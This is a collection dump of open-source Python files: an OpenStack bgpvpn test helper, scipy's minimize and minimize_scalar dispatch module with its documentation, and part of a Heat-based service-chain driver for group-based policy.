}
],
"symlink_target": ""
} |
from openstack_dashboard.test import helpers
from bgpvpn_dashboard.test.test_data import utils
class TestCase(helpers.TestCase):
def _setup_test_data(self):
super(TestCase, self)._setup_test_data()
utils.load_test_data(self)
class APITestCase(helpers.APITestCase):
def _setup_test_data(self):
super(APITestCase, self)._setup_test_data()
utils.load_test_data(self)
| {
"content_hash": "c8be05ca7e0903dedb8daf22a8d0a6a7",
"timestamp": "",
"source": "github",
"line_count": 17,
"max_line_length": 51,
"avg_line_length": 24.176470588235293,
"alnum_prop": 0.7007299270072993,
"repo_name": "openstack/networking-bgpvpn",
"id": "f3cfa374fc7a8e97d6aca4516eba215fd676f70a",
"size": "1038",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "bgpvpn_dashboard/test/helpers.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "5665"
},
{
"name": "Mako",
"bytes": "1055"
},
{
"name": "Python",
"bytes": "477528"
},
{
"name": "Shell",
"bytes": "4835"
}
],
"symlink_target": ""
} |
"""
Unified interfaces to minimization algorithms.
Functions
---------
- minimize : minimization of a function of several variables.
- minimize_scalar : minimization of a function of one variable.
"""
from __future__ import division, print_function, absolute_import
__all__ = ['minimize', 'minimize_scalar']
from warnings import warn
import numpy as np
from scipy._lib.six import callable
# unconstrained minimization
from .optimize import (_minimize_neldermead, _minimize_powell, _minimize_cg,
_minimize_bfgs, _minimize_newtoncg,
_minimize_scalar_brent, _minimize_scalar_bounded,
_minimize_scalar_golden, MemoizeJac)
from ._trustregion_dogleg import _minimize_dogleg
from ._trustregion_ncg import _minimize_trust_ncg
# constrained minimization
from .lbfgsb import _minimize_lbfgsb
from .tnc import _minimize_tnc
from .cobyla import _minimize_cobyla
from .slsqp import _minimize_slsqp
def minimize(fun, x0, args=(), method=None, jac=None, hess=None,
hessp=None, bounds=None, constraints=(), tol=None,
callback=None, options=None):
"""Minimization of scalar function of one or more variables.
In general, the optimization problems are of the form::
minimize f(x) subject to
g_i(x) >= 0, i = 1,...,m
h_j(x) = 0, j = 1,...,p
where x is a vector of one or more variables.
``g_i(x)`` are the inequality constraints.
``h_j(x)`` are the equality constrains.
Optionally, the lower and upper bounds for each element in x can also be
specified using the `bounds` argument.
Parameters
----------
fun : callable
Objective function.
x0 : ndarray
Initial guess.
args : tuple, optional
Extra arguments passed to the objective function and its
derivatives (Jacobian, Hessian).
method : str or callable, optional
Type of solver. Should be one of
- 'Nelder-Mead' :ref:`(see here) <optimize.minimize-neldermead>`
- 'Powell' :ref:`(see here) <optimize.minimize-powell>`
- 'CG' :ref:`(see here) <optimize.minimize-cg>`
- 'BFGS' :ref:`(see here) <optimize.minimize-bfgs>`
- 'Newton-CG' :ref:`(see here) <optimize.minimize-newtoncg>`
- 'L-BFGS-B' :ref:`(see here) <optimize.minimize-lbfgsb>`
- 'TNC' :ref:`(see here) <optimize.minimize-tnc>`
- 'COBYLA' :ref:`(see here) <optimize.minimize-cobyla>`
- 'SLSQP' :ref:`(see here) <optimize.minimize-slsqp>`
- 'dogleg' :ref:`(see here) <optimize.minimize-dogleg>`
- 'trust-ncg' :ref:`(see here) <optimize.minimize-trustncg>`
- custom - a callable object (added in version 0.14.0),
see below for description.
If not given, chosen to be one of ``BFGS``, ``L-BFGS-B``, ``SLSQP``,
depending if the problem has constraints or bounds.
jac : bool or callable, optional
Jacobian (gradient) of objective function. Only for CG, BFGS,
Newton-CG, L-BFGS-B, TNC, SLSQP, dogleg, trust-ncg.
If `jac` is a Boolean and is True, `fun` is assumed to return the
gradient along with the objective function. If False, the
gradient will be estimated numerically.
`jac` can also be a callable returning the gradient of the
objective. In this case, it must accept the same arguments as `fun`.
hess, hessp : callable, optional
Hessian (matrix of second-order derivatives) of objective function or
Hessian of objective function times an arbitrary vector p. Only for
Newton-CG, dogleg, trust-ncg.
Only one of `hessp` or `hess` needs to be given. If `hess` is
provided, then `hessp` will be ignored. If neither `hess` nor
`hessp` is provided, then the Hessian product will be approximated
using finite differences on `jac`. `hessp` must compute the Hessian
times an arbitrary vector.
bounds : sequence, optional
Bounds for variables (only for L-BFGS-B, TNC and SLSQP).
``(min, max)`` pairs for each element in ``x``, defining
the bounds on that parameter. Use None for one of ``min`` or
``max`` when there is no bound in that direction.
constraints : dict or sequence of dict, optional
Constraints definition (only for COBYLA and SLSQP).
Each constraint is defined in a dictionary with fields:
type : str
Constraint type: 'eq' for equality, 'ineq' for inequality.
fun : callable
The function defining the constraint.
jac : callable, optional
The Jacobian of `fun` (only for SLSQP).
args : sequence, optional
Extra arguments to be passed to the function and Jacobian.
Equality constraint means that the constraint function result is to
be zero whereas inequality means that it is to be non-negative.
Note that COBYLA only supports inequality constraints.
tol : float, optional
Tolerance for termination. For detailed control, use solver-specific
options.
options : dict, optional
A dictionary of solver options. All methods accept the following
generic options:
maxiter : int
Maximum number of iterations to perform.
disp : bool
Set to True to print convergence messages.
For method-specific options, see :func:`show_options()`.
callback : callable, optional
Called after each iteration, as ``callback(xk)``, where ``xk`` is the
current parameter vector.
Returns
-------
res : OptimizeResult
The optimization result represented as a ``OptimizeResult`` object.
Important attributes are: ``x`` the solution array, ``success`` a
Boolean flag indicating if the optimizer exited successfully and
``message`` which describes the cause of the termination. See
`OptimizeResult` for a description of other attributes.
See also
--------
minimize_scalar : Interface to minimization algorithms for scalar
univariate functions
show_options : Additional options accepted by the solvers
Notes
-----
This section describes the available solvers that can be selected by the
'method' parameter. The default method is *BFGS*.
**Unconstrained minimization**
Method :ref:`Nelder-Mead <optimize.minimize-neldermead>` uses the
Simplex algorithm [1]_, [2]_. This algorithm is robust in many
applications. However, if numerical computation of derivative can be
trusted, other algorithms using the first and/or second derivatives
information might be preferred for their better performance in
general.
Method :ref:`Powell <optimize.minimize-powell>` is a modification
of Powell's method [3]_, [4]_ which is a conjugate direction
method. It performs sequential one-dimensional minimizations along
each vector of the directions set (`direc` field in `options` and
`info`), which is updated at each iteration of the main
minimization loop. The function need not be differentiable, and no
derivatives are taken.
Method :ref:`CG <optimize.minimize-cg>` uses a nonlinear conjugate
gradient algorithm by Polak and Ribiere, a variant of the
Fletcher-Reeves method described in [5]_ pp. 120-122. Only the
first derivatives are used.
Method :ref:`BFGS <optimize.minimize-bfgs>` uses the quasi-Newton
method of Broyden, Fletcher, Goldfarb, and Shanno (BFGS) [5]_
pp. 136. It uses the first derivatives only. BFGS has proven good
performance even for non-smooth optimizations. This method also
returns an approximation of the Hessian inverse, stored as
`hess_inv` in the OptimizeResult object.
Method :ref:`Newton-CG <optimize.minimize-newtoncg>` uses a
Newton-CG algorithm [5]_ pp. 168 (also known as the truncated
Newton method). It uses a CG method to the compute the search
direction. See also *TNC* method for a box-constrained
minimization with a similar algorithm.
Method :ref:`dogleg <optimize.minimize-dogleg>` uses the dog-leg
trust-region algorithm [5]_ for unconstrained minimization. This
algorithm requires the gradient and Hessian; furthermore the
Hessian is required to be positive definite.
Method :ref:`trust-ncg <optimize.minimize-trustncg>` uses the
Newton conjugate gradient trust-region algorithm [5]_ for
unconstrained minimization. This algorithm requires the gradient
and either the Hessian or a function that computes the product of
the Hessian with a given vector.
**Constrained minimization**
Method :ref:`L-BFGS-B <optimize.minimize-lbfgsb>` uses the L-BFGS-B
algorithm [6]_, [7]_ for bound constrained minimization.
Method :ref:`TNC <optimize.minimize-tnc>` uses a truncated Newton
algorithm [5]_, [8]_ to minimize a function with variables subject
to bounds. This algorithm uses gradient information; it is also
called Newton Conjugate-Gradient. It differs from the *Newton-CG*
method described above as it wraps a C implementation and allows
each variable to be given upper and lower bounds.
Method :ref:`COBYLA <optimize.minimize-cobyla>` uses the
Constrained Optimization BY Linear Approximation (COBYLA) method
[9]_, [10]_, [11]_. The algorithm is based on linear
approximations to the objective function and each constraint. The
method wraps a FORTRAN implementation of the algorithm. The
constraints functions 'fun' may return either a single number
or an array or list of numbers.
Method :ref:`SLSQP <optimize.minimize-slsqp>` uses Sequential
Least SQuares Programming to minimize a function of several
variables with any combination of bounds, equality and inequality
constraints. The method wraps the SLSQP Optimization subroutine
originally implemented by Dieter Kraft [12]_. Note that the
wrapper handles infinite values in bounds by converting them into
large floating values.
**Custom minimizers**
It may be useful to pass a custom minimization method, for example
when using a frontend to this method such as `scipy.optimize.basinhopping`
or a different library. You can simply pass a callable as the ``method``
parameter.
The callable is called as ``method(fun, x0, args, **kwargs, **options)``
where ``kwargs`` corresponds to any other parameters passed to `minimize`
(such as `callback`, `hess`, etc.), except the `options` dict, which has
its contents also passed as `method` parameters pair by pair. Also, if
`jac` has been passed as a bool type, `jac` and `fun` are mangled so that
`fun` returns just the function values and `jac` is converted to a function
returning the Jacobian. The method shall return an ``OptimizeResult``
object.
The provided `method` callable must be able to accept (and possibly ignore)
arbitrary parameters; the set of parameters accepted by `minimize` may
expand in future versions and then these parameters will be passed to
the method. You can find an example in the scipy.optimize tutorial.
.. versionadded:: 0.11.0
References
----------
.. [1] Nelder, J A, and R Mead. 1965. A Simplex Method for Function
Minimization. The Computer Journal 7: 308-13.
.. [2] Wright M H. 1996. Direct search methods: Once scorned, now
respectable, in Numerical Analysis 1995: Proceedings of the 1995
Dundee Biennial Conference in Numerical Analysis (Eds. D F
Griffiths and G A Watson). Addison Wesley Longman, Harlow, UK.
191-208.
.. [3] Powell, M J D. 1964. An efficient method for finding the minimum of
a function of several variables without calculating derivatives. The
Computer Journal 7: 155-162.
.. [4] Press W, S A Teukolsky, W T Vetterling and B P Flannery.
Numerical Recipes (any edition), Cambridge University Press.
.. [5] Nocedal, J, and S J Wright. 2006. Numerical Optimization.
Springer New York.
.. [6] Byrd, R H and P Lu and J. Nocedal. 1995. A Limited Memory
Algorithm for Bound Constrained Optimization. SIAM Journal on
Scientific and Statistical Computing 16 (5): 1190-1208.
.. [7] Zhu, C and R H Byrd and J Nocedal. 1997. L-BFGS-B: Algorithm
778: L-BFGS-B, FORTRAN routines for large scale bound constrained
optimization. ACM Transactions on Mathematical Software 23 (4):
550-560.
.. [8] Nash, S G. Newton-Type Minimization Via the Lanczos Method.
1984. SIAM Journal of Numerical Analysis 21: 770-778.
.. [9] Powell, M J D. A direct search optimization method that models
the objective and constraint functions by linear interpolation.
1994. Advances in Optimization and Numerical Analysis, eds. S. Gomez
and J-P Hennart, Kluwer Academic (Dordrecht), 51-67.
.. [10] Powell M J D. Direct search algorithms for optimization
calculations. 1998. Acta Numerica 7: 287-336.
.. [11] Powell M J D. A view of algorithms for optimization without
derivatives. 2007.Cambridge University Technical Report DAMTP
2007/NA03
.. [12] Kraft, D. A software package for sequential quadratic
programming. 1988. Tech. Rep. DFVLR-FB 88-28, DLR German Aerospace
Center -- Institute for Flight Mechanics, Koln, Germany.
Examples
--------
Let us consider the problem of minimizing the Rosenbrock function. This
function (and its respective derivatives) is implemented in `rosen`
(resp. `rosen_der`, `rosen_hess`) in the `scipy.optimize`.
>>> from scipy.optimize import minimize, rosen, rosen_der
A simple application of the *Nelder-Mead* method is:
>>> x0 = [1.3, 0.7, 0.8, 1.9, 1.2]
>>> res = minimize(rosen, x0, method='Nelder-Mead', tol=1e-6)
>>> res.x
array([ 1., 1., 1., 1., 1.])
Now using the *BFGS* algorithm, using the first derivative and a few
options:
>>> res = minimize(rosen, x0, method='BFGS', jac=rosen_der,
... options={'gtol': 1e-6, 'disp': True})
Optimization terminated successfully.
Current function value: 0.000000
Iterations: 26
Function evaluations: 31
Gradient evaluations: 31
>>> res.x
array([ 1., 1., 1., 1., 1.])
>>> print(res.message)
Optimization terminated successfully.
>>> res.hess_inv
array([[ 0.00749589, 0.01255155, 0.02396251, 0.04750988, 0.09495377], # may vary
[ 0.01255155, 0.02510441, 0.04794055, 0.09502834, 0.18996269],
[ 0.02396251, 0.04794055, 0.09631614, 0.19092151, 0.38165151],
[ 0.04750988, 0.09502834, 0.19092151, 0.38341252, 0.7664427 ],
[ 0.09495377, 0.18996269, 0.38165151, 0.7664427, 1.53713523]])
Next, consider a minimization problem with several constraints (namely
Example 16.4 from [5]_). The objective function is:
>>> fun = lambda x: (x[0] - 1)**2 + (x[1] - 2.5)**2
There are three constraints defined as:
>>> cons = ({'type': 'ineq', 'fun': lambda x: x[0] - 2 * x[1] + 2},
... {'type': 'ineq', 'fun': lambda x: -x[0] - 2 * x[1] + 6},
... {'type': 'ineq', 'fun': lambda x: -x[0] + 2 * x[1] + 2})
And variables must be positive, hence the following bounds:
>>> bnds = ((0, None), (0, None))
The optimization problem is solved using the SLSQP method as:
>>> res = minimize(fun, (2, 0), method='SLSQP', bounds=bnds,
... constraints=cons)
It should converge to the theoretical solution (1.4 ,1.7).
"""
x0 = np.asarray(x0)
if x0.dtype.kind in np.typecodes["AllInteger"]:
x0 = np.asarray(x0, dtype=float)
if not isinstance(args, tuple):
args = (args,)
if method is None:
# Select automatically
if constraints:
method = 'SLSQP'
elif bounds is not None:
method = 'L-BFGS-B'
else:
method = 'BFGS'
if callable(method):
meth = "_custom"
else:
meth = method.lower()
if options is None:
options = {}
# check if optional parameters are supported by the selected method
# - jac
if meth in ['nelder-mead', 'powell', 'cobyla'] and bool(jac):
warn('Method %s does not use gradient information (jac).' % method,
RuntimeWarning)
# - hess
if meth not in ('newton-cg', 'dogleg', 'trust-ncg', '_custom') and hess is not None:
warn('Method %s does not use Hessian information (hess).' % method,
RuntimeWarning)
# - hessp
if meth not in ('newton-cg', 'dogleg', 'trust-ncg', '_custom') and hessp is not None:
warn('Method %s does not use Hessian-vector product '
'information (hessp).' % method, RuntimeWarning)
# - constraints or bounds
if (meth in ['nelder-mead', 'powell', 'cg', 'bfgs', 'newton-cg', 'dogleg',
'trust-ncg'] and (bounds is not None or np.any(constraints))):
warn('Method %s cannot handle constraints nor bounds.' % method,
RuntimeWarning)
if meth in ['l-bfgs-b', 'tnc'] and np.any(constraints):
warn('Method %s cannot handle constraints.' % method,
RuntimeWarning)
if meth == 'cobyla' and bounds is not None:
warn('Method %s cannot handle bounds.' % method,
RuntimeWarning)
# - callback
if (meth in ['cobyla'] and callback is not None):
warn('Method %s does not support callback.' % method, RuntimeWarning)
# - return_all
if (meth in ['l-bfgs-b', 'tnc', 'cobyla', 'slsqp'] and
options.get('return_all', False)):
warn('Method %s does not support the return_all option.' % method,
RuntimeWarning)
# fun also returns the jacobian
if not callable(jac):
if bool(jac):
fun = MemoizeJac(fun)
jac = fun.derivative
else:
jac = None
# set default tolerances
if tol is not None:
options = dict(options)
if meth == 'nelder-mead':
options.setdefault('xatol', tol)
options.setdefault('fatol', tol)
if meth in ['newton-cg', 'powell', 'tnc']:
options.setdefault('xtol', tol)
if meth in ['powell', 'l-bfgs-b', 'tnc', 'slsqp']:
options.setdefault('ftol', tol)
if meth in ['bfgs', 'cg', 'l-bfgs-b', 'tnc', 'dogleg', 'trust-ncg']:
options.setdefault('gtol', tol)
if meth in ['cobyla', '_custom']:
options.setdefault('tol', tol)
if meth == '_custom':
return method(fun, x0, args=args, jac=jac, hess=hess, hessp=hessp,
bounds=bounds, constraints=constraints,
callback=callback, **options)
elif meth == 'nelder-mead':
return _minimize_neldermead(fun, x0, args, callback, **options)
elif meth == 'powell':
return _minimize_powell(fun, x0, args, callback, **options)
elif meth == 'cg':
return _minimize_cg(fun, x0, args, jac, callback, **options)
elif meth == 'bfgs':
return _minimize_bfgs(fun, x0, args, jac, callback, **options)
elif meth == 'newton-cg':
return _minimize_newtoncg(fun, x0, args, jac, hess, hessp, callback,
**options)
elif meth == 'l-bfgs-b':
return _minimize_lbfgsb(fun, x0, args, jac, bounds,
callback=callback, **options)
elif meth == 'tnc':
return _minimize_tnc(fun, x0, args, jac, bounds, callback=callback,
**options)
elif meth == 'cobyla':
return _minimize_cobyla(fun, x0, args, constraints, **options)
elif meth == 'slsqp':
return _minimize_slsqp(fun, x0, args, jac, bounds,
constraints, callback=callback, **options)
elif meth == 'dogleg':
return _minimize_dogleg(fun, x0, args, jac, hess,
callback=callback, **options)
elif meth == 'trust-ncg':
return _minimize_trust_ncg(fun, x0, args, jac, hess, hessp,
callback=callback, **options)
else:
raise ValueError('Unknown solver %s' % method)
def minimize_scalar(fun, bracket=None, bounds=None, args=(),
method='brent', tol=None, options=None):
"""Minimization of scalar function of one variable.
Parameters
----------
fun : callable
Objective function.
Scalar function, must return a scalar.
bracket : sequence, optional
For methods 'brent' and 'golden', `bracket` defines the bracketing
interval and can either have three items `(a, b, c)` so that `a < b
< c` and `fun(b) < fun(a), fun(c)` or two items `a` and `c` which
are assumed to be a starting interval for a downhill bracket search
(see `bracket`); it doesn't always mean that the obtained solution
will satisfy `a <= x <= c`.
bounds : sequence, optional
For method 'bounded', `bounds` is mandatory and must have two items
corresponding to the optimization bounds.
args : tuple, optional
Extra arguments passed to the objective function.
method : str or callable, optional
Type of solver. Should be one of
- 'Brent' :ref:`(see here) <optimize.minimize_scalar-brent>`
- 'Bounded' :ref:`(see here) <optimize.minimize_scalar-bounded>`
- 'Golden' :ref:`(see here) <optimize.minimize_scalar-golden>`
- custom - a callable object (added in version 0.14.0),
see below
tol : float, optional
Tolerance for termination. For detailed control, use solver-specific
options.
options : dict, optional
A dictionary of solver options.
maxiter : int
Maximum number of iterations to perform.
disp : bool
Set to True to print convergence messages.
See :func:`show_options()` for solver-specific options.
Returns
-------
res : OptimizeResult
The optimization result represented as a ``OptimizeResult`` object.
Important attributes are: ``x`` the solution array, ``success`` a
Boolean flag indicating if the optimizer exited successfully and
``message`` which describes the cause of the termination. See
`OptimizeResult` for a description of other attributes.
See also
--------
minimize : Interface to minimization algorithms for scalar multivariate
functions
show_options : Additional options accepted by the solvers
Notes
-----
This section describes the available solvers that can be selected by the
'method' parameter. The default method is *Brent*.
Method :ref:`Brent <optimize.minimize_scalar-brent>` uses Brent's
algorithm to find a local minimum. The algorithm uses inverse
parabolic interpolation when possible to speed up convergence of
the golden section method.
Method :ref:`Golden <optimize.minimize_scalar-golden>` uses the
golden section search technique. It uses analog of the bisection
method to decrease the bracketed interval. It is usually
preferable to use the *Brent* method.
Method :ref:`Bounded <optimize.minimize_scalar-bounded>` can
perform bounded minimization. It uses the Brent method to find a
local minimum in the interval x1 < xopt < x2.
**Custom minimizers**
It may be useful to pass a custom minimization method, for example
when using some library frontend to minimize_scalar. You can simply
pass a callable as the ``method`` parameter.
The callable is called as ``method(fun, args, **kwargs, **options)``
where ``kwargs`` corresponds to any other parameters passed to `minimize`
(such as `bracket`, `tol`, etc.), except the `options` dict, which has
its contents also passed as `method` parameters pair by pair. The method
shall return an ``OptimizeResult`` object.
The provided `method` callable must be able to accept (and possibly ignore)
arbitrary parameters; the set of parameters accepted by `minimize` may
expand in future versions and then these parameters will be passed to
the method. You can find an example in the scipy.optimize tutorial.
.. versionadded:: 0.11.0
Examples
--------
Consider the problem of minimizing the following function.
>>> def f(x):
... return (x - 2) * x * (x + 2)**2
Using the *Brent* method, we find the local minimum as:
>>> from scipy.optimize import minimize_scalar
>>> res = minimize_scalar(f)
>>> res.x
1.28077640403
Using the *Bounded* method, we find a local minimum with specified
bounds as:
>>> res = minimize_scalar(f, bounds=(-3, -1), method='bounded')
>>> res.x
-2.0000002026
"""
if not isinstance(args, tuple):
args = (args,)
if callable(method):
meth = "_custom"
else:
meth = method.lower()
if options is None:
options = {}
if tol is not None:
options = dict(options)
if meth == 'bounded' and 'xatol' not in options:
warn("Method 'bounded' does not support relative tolerance in x; "
"defaulting to absolute tolerance.", RuntimeWarning)
options['xatol'] = tol
elif meth == '_custom':
options.setdefault('tol', tol)
else:
options.setdefault('xtol', tol)
if meth == '_custom':
return method(fun, args=args, bracket=bracket, bounds=bounds, **options)
elif meth == 'brent':
return _minimize_scalar_brent(fun, bracket, args, **options)
elif meth == 'bounded':
if bounds is None:
raise ValueError('The `bounds` parameter is mandatory for '
'method `bounded`.')
return _minimize_scalar_bounded(fun, bounds, args, **options)
elif meth == 'golden':
return _minimize_scalar_golden(fun, bracket, args, **options)
else:
raise ValueError('Unknown solver %s' % method)
| {
"content_hash": "3835d3762330648885cb99a8235d31aa",
"timestamp": "",
"source": "github",
"line_count": 616,
"max_line_length": 89,
"avg_line_length": 42.910714285714285,
"alnum_prop": 0.6386713577724814,
"repo_name": "DailyActie/Surrogate-Model",
"id": "622c32eaa7231178c68c4803410582e04cf97089",
"size": "26433",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "01-codes/scipy-master/scipy/optimize/_minimize.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Awk",
"bytes": "345"
},
{
"name": "Batchfile",
"bytes": "18746"
},
{
"name": "C",
"bytes": "13004913"
},
{
"name": "C++",
"bytes": "14692003"
},
{
"name": "CMake",
"bytes": "72831"
},
{
"name": "CSS",
"bytes": "303488"
},
{
"name": "Fortran",
"bytes": "7339415"
},
{
"name": "HTML",
"bytes": "854774"
},
{
"name": "Java",
"bytes": "38854"
},
{
"name": "JavaScript",
"bytes": "2432846"
},
{
"name": "Jupyter Notebook",
"bytes": "829689"
},
{
"name": "M4",
"bytes": "1379"
},
{
"name": "Makefile",
"bytes": "48708"
},
{
"name": "Matlab",
"bytes": "4346"
},
{
"name": "Objective-C",
"bytes": "567"
},
{
"name": "PHP",
"bytes": "93585"
},
{
"name": "Pascal",
"bytes": "1449"
},
{
"name": "Perl",
"bytes": "1152272"
},
{
"name": "PowerShell",
"bytes": "17042"
},
{
"name": "Python",
"bytes": "34668203"
},
{
"name": "Roff",
"bytes": "5925"
},
{
"name": "Ruby",
"bytes": "92498"
},
{
"name": "Shell",
"bytes": "94698"
},
{
"name": "TeX",
"bytes": "156540"
},
{
"name": "TypeScript",
"bytes": "41691"
}
],
"symlink_target": ""
} |
import ast
import time
from heatclient import client as heat_client
from heatclient import exc as heat_exc
from neutron.common import log
from neutron.db import model_base
from neutron import manager
from neutron.openstack.common import jsonutils
from neutron.openstack.common import log as logging
from neutron.plugins.common import constants as pconst
from oslo.config import cfg
import sqlalchemy as sa
from gbpservice.neutron.services.servicechain.common import exceptions as exc
LOG = logging.getLogger(__name__)
service_chain_opts = [
cfg.IntOpt('stack_delete_retries',
default=5,
help=_("Number of attempts to retry for stack deletion")),
cfg.IntOpt('stack_delete_retry_wait',
default=3,
help=_("Wait time between two successive stack delete "
"retries")),
cfg.StrOpt('heat_uri',
default='http://localhost:8004/v1',
help=_("Heat server address to create services "
"specified in the service chain.")),
cfg.StrOpt('heat_ca_certificates_file', default=None,
help=_('CA file for heatclient to verify server certificates')),
cfg.BoolOpt('heat_api_insecure', default=False,
help=_("If True, ignore any SSL validation issues")),
]
cfg.CONF.register_opts(service_chain_opts, "simplechain")
# Service chain API supported Values
sc_supported_type = [pconst.LOADBALANCER, pconst.FIREWALL]
STACK_DELETE_RETRIES = cfg.CONF.simplechain.stack_delete_retries
STACK_DELETE_RETRY_WAIT = cfg.CONF.simplechain.stack_delete_retry_wait
class ServiceChainInstanceStack(model_base.BASEV2):
"""ServiceChainInstance stacks owned by the servicechain driver."""
__tablename__ = 'sc_instance_stacks'
instance_id = sa.Column(sa.String(36),
nullable=False, primary_key=True)
stack_id = sa.Column(sa.String(36),
nullable=False, primary_key=True)
class SimpleChainDriver(object):
@log.log
def initialize(self):
pass
@log.log
def create_servicechain_node_precommit(self, context):
if context.current['service_profile_id'] is None:
if context.current['service_type'] not in sc_supported_type:
raise exc.InvalidServiceTypeForReferenceDriver()
elif context.current['service_type']:
LOG.warn(_('Both service_profile_id and service_type are'
'specified, service_type will be ignored.'))
@log.log
def create_servicechain_node_postcommit(self, context):
pass
@log.log
def update_servicechain_node_precommit(self, context):
if (context.original['config'] != context.current['config']):
filters = {'servicechain_spec': context.original[
'servicechain_specs']}
sc_instances = context._plugin.get_servicechain_instances(
context._plugin_context, filters)
if sc_instances:
raise exc.NodeUpdateNotSupported()
@log.log
def update_servicechain_node_postcommit(self, context):
pass
@log.log
def delete_servicechain_node_precommit(self, context):
pass
@log.log
def delete_servicechain_node_postcommit(self, context):
pass
@log.log
def create_servicechain_spec_precommit(self, context):
pass
@log.log
def create_servicechain_spec_postcommit(self, context):
pass
@log.log
def update_servicechain_spec_precommit(self, context):
pass
@log.log
def update_servicechain_spec_postcommit(self, context):
if context.original['nodes'] != context.current['nodes']:
filters = {'servicechain_spec': [context.original['id']]}
sc_instances = context._plugin.get_servicechain_instances(
context._plugin_context, filters)
for sc_instance in sc_instances:
self._update_servicechain_instance(context,
sc_instance,
context._sc_spec)
@log.log
def delete_servicechain_spec_precommit(self, context):
pass
@log.log
def delete_servicechain_spec_postcommit(self, context):
pass
@log.log
def create_servicechain_instance_precommit(self, context):
pass
@log.log
def create_servicechain_instance_postcommit(self, context):
sc_instance = context.current
sc_spec_ids = sc_instance.get('servicechain_specs')
for sc_spec_id in sc_spec_ids:
sc_spec = context._plugin.get_servicechain_spec(
context._plugin_context, sc_spec_id)
sc_node_ids = sc_spec.get('nodes')
self._create_servicechain_instance_stacks(context, sc_node_ids,
sc_instance, sc_spec)
@log.log
def update_servicechain_instance_precommit(self, context):
pass
@log.log
def update_servicechain_instance_postcommit(self, context):
original_spec_ids = context.original.get('servicechain_specs')
new_spec_ids = context.current.get('servicechain_specs')
if set(original_spec_ids) != set(new_spec_ids):
for new_spec_id in new_spec_ids:
newspec = context._plugin.get_servicechain_spec(
context._plugin_context, new_spec_id)
self._update_servicechain_instance(context, context.current,
newspec)
@log.log
def delete_servicechain_instance_precommit(self, context):
pass
@log.log
def delete_servicechain_instance_postcommit(self, context):
self._delete_servicechain_instance_stacks(context._plugin_context,
context.current['id'])
@log.log
def create_service_profile_precommit(self, context):
if context.current['service_type'] not in sc_supported_type:
raise exc.InvalidServiceTypeForReferenceDriver()
@log.log
def create_service_profile_postcommit(self, context):
pass
@log.log
def update_service_profile_precommit(self, context):
pass
@log.log
def update_service_profile_postcommit(self, context):
pass
@log.log
def delete_service_profile_precommit(self, context):
pass
@log.log
def delete_service_profile_postcommit(self, context):
pass
def _get_ptg(self, context, ptg_id):
return self._get_resource(self._grouppolicy_plugin,
context._plugin_context,
'policy_target_group',
ptg_id)
def _get_pt(self, context, pt_id):
return self._get_resource(self._grouppolicy_plugin,
context._plugin_context,
'policy_target',
pt_id)
def _get_port(self, context, port_id):
return self._get_resource(self._core_plugin,
context._plugin_context,
'port',
port_id)
def _get_ptg_subnet(self, context, ptg_id):
ptg = self._get_ptg(context, ptg_id)
return ptg.get("subnets")[0]
def _get_member_ips(self, context, ptg_id):
ptg = self._get_ptg(context, ptg_id)
pt_ids = ptg.get("policy_targets")
member_addresses = []
for pt_id in pt_ids:
pt = self._get_pt(context, pt_id)
port_id = pt.get("port_id")
port = self._get_port(context, port_id)
ipAddress = port.get('fixed_ips')[0].get("ip_address")
member_addresses.append(ipAddress)
return member_addresses
def _fetch_template_and_params(self, context, sc_instance,
sc_spec, sc_node):
stack_template = sc_node.get('config')
# TODO(magesh):Raise an exception ??
if not stack_template:
LOG.error(_("Service Config is not defined for the service"
" chain Node"))
return
stack_template = jsonutils.loads(stack_template)
config_param_values = sc_instance.get('config_param_values', {})
stack_params = {}
# config_param_values has the parameters for all Nodes. Only apply
# the ones relevant for this Node
if config_param_values:
config_param_values = jsonutils.loads(config_param_values)
config_param_names = sc_spec.get('config_param_names', [])
if config_param_names:
config_param_names = ast.literal_eval(config_param_names)
# This service chain driver knows how to fill in two parameter values
# for the template at present.
# 1)Subnet -> Provider PTG subnet is used
# 2)PoolMemberIPs -> List of IP Addresses of all PTs in Provider PTG
# TODO(magesh):Process on the basis of ResourceType rather than Name
# eg: Type: OS::Neutron::PoolMember
# Variable number of pool members is not handled yet. We may have to
# dynamically modify the template json to achieve that
member_ips = []
provider_ptg_id = sc_instance.get("provider_ptg_id")
# If we have the key "PoolMemberIP*" in template input parameters,
# fetch the list of IPs of all PTs in the PTG
for key in config_param_names or []:
if "PoolMemberIP" in key:
member_ips = self._get_member_ips(context, provider_ptg_id)
break
member_count = 0
for key in config_param_names or []:
if "PoolMemberIP" in key:
value = (member_ips[member_count]
if len(member_ips) > member_count else '0')
member_count = member_count + 1
config_param_values[key] = value
elif key == "Subnet":
value = self._get_ptg_subnet(context, provider_ptg_id)
config_param_values[key] = value
node_params = (stack_template.get('Parameters')
or stack_template.get('parameters'))
if node_params:
for parameter in config_param_values.keys():
if parameter in node_params.keys():
stack_params[parameter] = config_param_values[parameter]
return (stack_template, stack_params)
def _create_servicechain_instance_stacks(self, context, sc_node_ids,
sc_instance, sc_spec):
heatclient = HeatClient(context._plugin_context)
for sc_node_id in sc_node_ids:
sc_node = context._plugin.get_servicechain_node(
context._plugin_context, sc_node_id)
stack_template, stack_params = self._fetch_template_and_params(
context, sc_instance, sc_spec, sc_node)
stack_name = ("stack_" + sc_instance['name'] + sc_node['name'] +
sc_instance['id'][:8])
stack = heatclient.create(
stack_name.replace(" ", ""), stack_template, stack_params)
self._insert_chain_stack_db(
context._plugin_context.session, sc_instance['id'],
stack['stack']['id'])
def _delete_servicechain_instance_stacks(self, context, instance_id):
stack_ids = self._get_chain_stacks(context.session, instance_id)
heatclient = HeatClient(context)
for stack in stack_ids:
heatclient.delete(stack.stack_id)
for stack in stack_ids:
self._wait_for_stack_delete(heatclient, stack.stack_id)
self._delete_chain_stacks_db(context.session, instance_id)
# Wait for the heat stack to be deleted for a maximum of 15 seconds
# we check the status every 3 seconds and call sleep again
# This is required because cleanup of subnet fails when the stack created
# some ports on the subnet and the resource delete is not completed by
# the time subnet delete is triggered by Resource Mapping driver
def _wait_for_stack_delete(self, heatclient, stack_id):
stack_delete_retries = STACK_DELETE_RETRIES
while True:
try:
stack = heatclient.get(stack_id)
if stack.stack_status == 'DELETE_COMPLETE':
return
elif stack.stack_status == 'DELETE_FAILED':
heatclient.delete(stack_id)
